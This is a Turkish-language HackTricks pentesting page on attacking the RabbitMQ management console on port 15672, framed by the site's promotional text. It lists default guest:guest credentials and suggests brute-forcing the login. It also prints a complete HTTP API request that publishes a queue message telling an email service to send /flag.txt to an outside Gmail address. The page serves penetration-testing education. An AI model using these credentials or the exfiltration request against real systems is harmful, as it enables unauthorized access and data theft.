4.5 KiB
15672 - RabbitMQ Yönetimi Pentesting
AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'yi keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Eğer hacking kariyeri ile ilgileniyorsanız ve hacklenemez olanı hacklemek istiyorsanız - işe alıyoruz! (akıcı Lehçe yazılı ve sözlü gereklidir).
{% embed url="https://www.stmcyber.com/careers" %}
Temel Bilgiler
RabbitMQ hakkında daha fazla bilgi için 5671,5672 - AMQP Pentesting'e göz atabilirsiniz.
Bu bağlantı noktasında, yönetim eklentisi etkinse, RabbitMQ Yönetim web konsolunu bulabilirsiniz.
Ana sayfa aşağıdaki gibi görünmelidir:
Enumerasyon
Varsayılan kimlik bilgileri "guest":"guest". Çalışmıyorlarsa girişi kaba kuvvetle deneyebilirsiniz.
Bu modülü manuel olarak başlatmak için aşağıdaki komutu çalıştırmanız gerekmektedir:
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
Doğru kimlik doğrulaması yaptıktan sonra yönetici konsolunu göreceksiniz:
Ayrıca, geçerli kimlik bilgileriniz varsa, http://localhost:15672/api/connections
adresindeki bilgiler ilginizi çekebilir.
Ayrıca, bu hizmetin API'sini kullanarak bir kuyruğa veri yayınlamak mümkündür. İlgili istek şu şekildedir:
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
Shodan
port:15672 http
Eğer hacking kariyeri ile ilgileniyorsanız ve hacklenemez olanı hacklemek istiyorsanız - işe alıyoruz! (akıcı polonyaca yazılı ve sözlü gereklidir).
{% embed url="https://www.stmcyber.com/careers" %}
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- Özel NFT'lerden oluşan koleksiyonumuz olan The PEASS Family'yi keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm'da takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github reposuna PR göndererek paylaşın.